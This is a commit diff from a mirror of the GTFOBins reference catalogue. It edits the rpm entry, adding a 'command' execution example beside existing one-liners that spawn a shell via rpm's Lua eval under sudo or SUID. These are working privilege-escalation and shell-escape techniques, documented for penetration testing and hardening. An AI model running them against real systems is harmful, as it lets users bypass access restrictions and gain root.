mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
add command
for rpm
and delete unnecessary prefix
This commit is contained in:
parent
c3f37d9e09
commit
565ebae880
@ -2,8 +2,12 @@
|
|||||||
functions:
|
functions:
|
||||||
shell:
|
shell:
|
||||||
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
|
command:
|
||||||
|
- code: |
|
||||||
|
rpm --pipe '/bin/id > /tmp/result'
|
||||||
|
cat /tmp/result
|
||||||
limited-suid:
|
limited-suid:
|
||||||
- code: ./rpm --eval '%{lua:os.execute("/bin/sh")}'
|
- code: rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
sudo:
|
sudo:
|
||||||
- code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
|
- code: sudo rpm --eval '%{lua:os.execute("/bin/sh")}'
|
||||||
- description: |
|
- description: |
|
||||||
|
Loading…
Reference in New Issue
Block a user